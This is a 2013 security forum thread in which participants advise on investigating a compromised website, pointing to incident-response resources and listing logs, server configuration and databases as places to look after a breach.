February 4, 2013 at 5:45 am #8189
Im seeing a lot of companies and individuals asking for forensics of their website after it gets hacked and was wondering if some of yall have experience in this and how do you go about doing this type of work?
For example like a WordPress site that gets compromised and is serving up malware, how would you determine what happened or where to look?
February 4, 2013 at 7:21 am #51765dynamikParticipant
Search for “incident” on this page; there are several publications: http://csrc.nist.gov/publications/PubsSPs.html
This is a great book as well: http://www.amazon.com/Real-Digital-Forensics-Computer-Security/dp/0321240693
February 4, 2013 at 3:27 pm #51766
Thanks for the links, ajohnson but im talking about website forensics, not just general computer forensics. Like which areas on a website do you go to look for intrusion and how to mitigate them.
February 4, 2013 at 4:03 pm #51767ziggy_567Participant
Regardless of whether you’re looking for compromise on a workstation, webserver, or whatever….it all boils down to what logging do you have in place. Without the logs, you can’t do much investigating….
If adequate logging is in place, the incident response/investigation process does not deviate just because it’s a webserver.
February 4, 2013 at 4:49 pm #51768caissydParticipant
I agree with ziggy_567.
Like which areas on a website do you go to look for intrusion and how to mitigate them.
Mitigating vulnerabilities could be quite a challenge. I will start with OWASP Top 10 vulnerabilities found in web applications:https://www.owasp.org/index.php/Top_10_2010-Main
February 4, 2013 at 6:40 pm #51769dynamikParticipant
Exactly what Ziggy said. The techniques are the same regardless of whether its a web server, a database server, a domain controller, etc. You may be looking at a different log file and ancillary evidence, but its the same general process. The resources I provided will answer your questions. Check out the “Hackers Challenges” books as well; they walk you through real attacks and the ensuing IH/IR.
You also have to remember that a web app compromise can lead to a full-blown system compromise. You can’t just fix a hole in a web app and call it a day. If a backdoor is left unnoticed and active, you’ll still have a big problem on your hands. So again, regardless of whether the initial vector is a web app or a user downloading malware, you should still check when files were modified, running processes, user activity, network activity, etc.
February 5, 2013 at 3:18 am #51770
The Hackers Challenges books are just what i was looking for. Thanks ajohnson.
February 6, 2013 at 4:01 am #51771KetchupParticipant
This one is actually tough. In forensics, we have live system analysis and dead-box forensics. In order to do a complete investigation of a hacking/malware attack, you would want to capture RAM, other volatile information, and a forensic image of the box. This is really the best evidence for an analysis. Unfortunately, many Word Press, Joomla, and other CMS sites are run on shared hosting. You will not get access to the actual server (or the virtual machine) in most cases.
February 6, 2013 at 4:43 pm #51772caissydParticipant
Nice point Ketchup!
February 12, 2013 at 1:33 pm #51773jimbobParticipant
Off the top of my head here’s a couple of things you need to look at for forensic exam post-compromise on a web server. No doubt there’s some repetition of what’s been said but here goes.
- Logs – check the access logs for the web server for attack strings, access to admin pages and anything else that looks anomalous e.g. access to backdoor files.
- Server config – are there any new configuration added? Check for things like malicious Apache modules.
- database – most web applications have some kind of backing store or database. Are there new accounts added? Is there anything else in there that could provide persistent access?
Your aim ought to be to determine how the compromise occurred, what was carried out after the attack and remedy the situation. Remember to use Google since the attack is probably not unique to you. What web software are you using? Popular packages such as WordPress and Joomla are often the target for automated and effective attacks.
You must be logged in to reply to this topic.